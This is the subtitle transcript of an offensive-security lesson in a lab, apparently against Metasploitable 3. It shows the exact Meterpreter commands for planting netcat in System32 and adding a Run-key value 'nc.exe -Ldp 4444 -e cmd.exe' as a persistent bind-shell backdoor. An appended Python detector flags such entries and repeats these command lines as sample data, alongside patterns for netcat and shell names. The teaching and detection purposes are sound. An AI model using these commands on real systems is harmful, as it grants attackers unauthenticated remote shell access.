1 00:00:00,730 --> 00:00:06,310 So Meterpreter has some very useful functions for registry interaction.
2 00:00:07,640 --> 00:00:12,380 You can read, write, create and delete remotely any registry entry.
3 00:00:13,630 --> 00:00:20,080 So these can be used for, well, any number of actions, including remote information gathering.
4 00:00:21,610 --> 00:00:28,630 So by using the registry, one can find what files have been used, websites visited, programs, USB
5 00:00:28,630 --> 00:00:30,780 devices used and so on and so forth.
6 00:00:31,950 --> 00:00:37,740 So basically, the Windows Registry is a magical place, and if you're planning on doing more.
7 00:00:39,070 --> 00:00:41,630 And yes, it is my job to help you do more.
8 00:00:41,890 --> 00:00:47,590 So let's plan for it by creating a persistent netcat backdoor.
9 00:00:48,850 --> 00:00:53,020 So in this example, instead of looking up information on the remote system,
10 00:00:54,160 --> 00:00:57,010 you will be installing a netcat backdoor.
11 00:00:58,220 --> 00:01:05,870 And it's going to include changes to the system registry and firewall and send back to you a persistent
12 00:01:05,870 --> 00:01:06,320 shell.
13 00:01:07,600 --> 00:01:09,070 So let me show you.
14 00:01:11,470 --> 00:01:13,210 After gaining a Meterpreter shell,
15 00:01:14,230 --> 00:01:23,380 you can use the reg command to interact with the Windows remote registry, and here's a help menu for
16 00:01:23,380 --> 00:01:23,980 this command.
17 00:01:25,190 --> 00:01:27,920 And you can do many, many things with these parameters.
18 00:01:29,000 --> 00:01:33,410 But my point here is to create a persistent backdoor on the target.
19 00:01:34,430 --> 00:01:40,610 And to accomplish that, I will upload netcat, which is a legitimate .exe file.
20 00:01:41,740 --> 00:01:49,900 So upload /usr/share/windows-binaries/nc.exe
21 00:01:50,840 --> 00:01:52,730 to C:\
22 00:01:54,630 --> 00:01:55,410 Windows
23 00:01:56,740 --> 00:01:58,300 \System32.
24 00:02:03,160 --> 00:02:05,410 And sure enough, uploading is OK.
25 00:02:07,700 --> 00:02:16,120 So now I need to run netcat on behalf of the current user by manipulating the registry. To do that,
26 00:02:16,580 --> 00:02:17,280 first
27 00:02:17,530 --> 00:02:19,670 I'm going to enumerate the key
28 00:02:21,350 --> 00:02:22,400 HKLM
29 00:02:29,080 --> 00:02:31,870 Windows\CurrentVersion
30 00:02:34,200 --> 00:02:34,740 \Run.
31 00:02:39,260 --> 00:02:45,920 Now, this key is special because it defines the applications it will run automatically when the system
32 00:02:45,920 --> 00:02:46,370 starts.
33 00:02:48,100 --> 00:02:54,490 enumkey will bring the values, and -k to specify the key name.
34 00:02:55,760 --> 00:02:57,920 And here are the entries of the key.
35 00:02:59,470 --> 00:03:04,150 So now I'm going to add a value to this key so that I can run netcat.
36 00:03:05,660 --> 00:03:10,220 So type reg setval -k,
37 00:03:11,680 --> 00:03:13,060 the key name, and -v
38 00:03:16,180 --> 00:03:18,130 backdoor,
39 00:03:19,530 --> 00:03:20,190 and then
40 00:03:21,680 --> 00:03:22,220 -d
41 00:03:24,490 --> 00:03:31,330 C:\Windows\System32\nc.exe
42 00:03:32,480 --> 00:03:33,230 -Ldp
43 00:03:34,320 --> 00:03:39,870 4444 -e cmd.exe.
44 00:03:41,020 --> 00:03:44,360 OK, it's a long line, but it's kind of simple to explain.
45 00:03:44,380 --> 00:03:45,300 So let's break it down.
46 00:03:46,240 --> 00:03:50,980 setval, well, sets the value of an entry for the registry key.
47 00:03:52,390 --> 00:03:54,700 -v gives a name to the entry.
48 00:03:55,950 --> 00:03:57,790 And finally, the -d
49 00:03:59,140 --> 00:04:01,180 adds the data to the entry.
50 00:04:02,340 --> 00:04:05,990 Yeah, so checking the entry is OK:
51 00:04:07,490 --> 00:04:08,090 reg
52 00:04:09,040 --> 00:04:10,750 queryval -k
53 00:04:11,880 --> 00:04:12,690 the key name
54 00:04:13,980 --> 00:04:17,040 and the backdoor.
55 00:04:19,740 --> 00:04:26,400 So queryval will display the data for a specific entry as it is.
56 00:04:28,060 --> 00:04:35,320 OK, now netcat will be run with these parameters and it will start a Windows command line on port
57 00:04:35,320 --> 00:04:40,030 4444 if Metasploitable 3 restarts.
58 00:04:42,230 --> 00:04:46,360 OK, so let me quickly show you the registry as well.
59 00:04:53,390 --> 00:04:56,360 All right, so here is the value that you just added.
60 00:04:57,550 --> 00:05:00,880 And now I'll quickly restart Metasploitable 3.
61 00:05:02,800 --> 00:05:04,810 When Metasploitable starts again,
62 00:05:09,870 --> 00:05:12,120 and see, my session naturally died.
63 00:05:14,320 --> 00:05:15,820 But now I don't need this anymore.
64 00:05:22,010 --> 00:05:23,270 So I'll open a new tab.
65 00:05:26,420 --> 00:05:33,980 Type nc, the target IP address, and port 4444.
66 00:05:34,930 --> 00:05:35,710 Perfect.
67 00:05:36,890 --> 00:05:42,620 We connect to the Windows command line that gets started for us on port 4444.
68 00:05:44,200 --> 00:05:49,480 So that way you can use any Windows commands here, for example, ipconfig.
69 00:05:52,750 --> 00:05:55,300 Congratulations, you have your first system backdoor.
70 00:05:56,930 --> 00:05:59,420 And you can come back any time you need to use it.
71 00:06:01,030 --> 00:06:08,110 And let me tell you, additionally, in a real-world situation, you would not be using such a simple
72 00:06:08,110 --> 00:06:13,370 backdoor like this because, you know, there's no authentication or encryption.
73 00:06:14,440 --> 00:06:21,490 However, the principles of the process remain the same for other changes to the system and other sorts
74 00:06:21,490 --> 00:06:24,640 of programs you might want to execute on startup.
75 00:06:25,710 --> 00:06:33,000 I'm going to tell you about msfvenom in the next section so that you can create later on your custom
76 00:06:33,150 --> 00:06:36,270 data file to use for this process.
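As an added example that is not part of the course transcript (nor Metasploit's own code), here is the defender's side of the same Run-key change: a Python script that parses the text `reg query` prints for the Run keys and flags values whose command line looks like a netcat-style bind shell (`nc.exe -Ldp 4444 -e cmd.exe`). The registry dump it parses is constructed for the example; the key paths and the `backdoor` value name mirror the lesson, and the scoring weights, the second `updater` entry and the masquerading check are my own additions.

```python
"""Flag netcat-style persistence in Windows Run keys.

Added example, not course material. Input is the text `reg query <key>`
prints on Windows (or the same text exported from a forensic image);
the SAMPLE_REG_OUTPUT below is constructed for the demonstration.
"""
import re
from typing import Dict, List, Optional

NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe", "nc", "ncat"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "pwsh.exe", "pwsh"}
# Names attackers borrow for copies dropped outside System32 (assumed list).
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}
SUSPICIOUS_SCORE = 3  # assumed threshold: netcat+listen or any -e <shell> trips it

# `reg query` prints a value as: 4 spaces, name, 4 spaces, REG_* type, 4 spaces, data.
VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
# Command-line tokens: a double-quoted path or a run of non-space characters.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Constructed sample: one clean HKLM entry, one VMware entry, the lesson's
# backdoor, a clean HKCU entry and a masquerading svchost.exe dropped in Temp.
SAMPLE_REG_OUTPUT = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\\system32\\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -n vmusr
    backdoor    REG_SZ    C:\\Windows\\System32\\nc.exe -Ldp 4444 -e cmd.exe

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    updater    REG_SZ    "C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe" -lvp 31337 -e powershell.exe
"""


def parse_reg_query(text: str) -> List[Dict[str, str]]:
    """Turn `reg query` output into a list of {key, name, type, data} dicts."""
    entries: List[Dict[str, str]] = []
    key: Optional[str] = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()          # a new key header precedes its values
            continue
        m = VALUE_RE.match(line)
        if m and key:
            entries.append({"key": key, **m.groupdict()})
    return entries


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted paths as one token."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_command(cmdline: str) -> Dict[str, object]:
    """Score one Run value's command line for bind-shell traits."""
    tokens = tokenize(cmdline)
    result: Dict[str, object] = {"exe": None, "port": None, "score": 0, "reasons": []}
    if not tokens:
        return result
    exe = basename(tokens[0])
    reasons: List[str] = []
    score = 0
    listen = False
    port: Optional[int] = None
    for i in range(1, len(tokens)):
        tok, low = tokens[i], tokens[i].lower()
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        # Bundled flags such as -Ldp / -lvp: 'l' listens, 'p' takes the port.
        if re.fullmatch(r"-[a-zA-Z]+", tok):
            if "l" in low:
                listen = True
            if "p" in low and nxt.isdigit():
                port = int(nxt)
        # -e / -c <program>: run a shell on connect, the signature of a backdoor.
        if low in ("-e", "-c") and basename(nxt) in SHELLS:
            reasons.append(f"runs {nxt} on connect ({tok})")
            score += 3
    if listen and port is None:  # e.g. `nc -l 4444` without -p
        port = next((int(t) for t in tokens[1:] if t.isdigit()), None)
    if exe in NETCAT_NAMES:
        reasons.append(f"netcat binary {exe}")
        score += 2
    if listen:
        reasons.append("listen mode (-l/-L)" + (f" on port {port}" if port else ""))
        score += 1
    if exe in SYSTEM_NAMES and "\\windows\\system32\\" not in tokens[0].lower():
        reasons.append(f"{exe} outside System32 (masquerading)")
        score += 2
    result.update({"exe": exe, "port": port, "score": score, "reasons": reasons})
    return result


def find_persistence(text: str) -> List[Dict[str, object]]:
    """Return the Run values whose score reaches SUSPICIOUS_SCORE."""
    findings = []
    for entry in parse_reg_query(text):
        verdict = analyze_command(entry["data"])
        if verdict["score"] >= SUSPICIOUS_SCORE:
            findings.append({"key": entry["key"], "name": entry["name"],
                             "data": entry["data"], **verdict})
    return findings


if __name__ == "__main__":
    for f in find_persistence(SAMPLE_REG_OUTPUT):
        print(f"[{f['score']}] {f['key']}\\{f['name']}: {f['data']}")
        for r in f["reasons"]:
            print("      -", r)
```

On a live host, feed it the output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKCU and RunOnce keys) instead of the constructed sample; the VMware and OneDrive entries show that an ordinary `-n` or `/background` flag does not trip the score, while the lesson's `-Ldp 4444 -e cmd.exe` does on two independent signals.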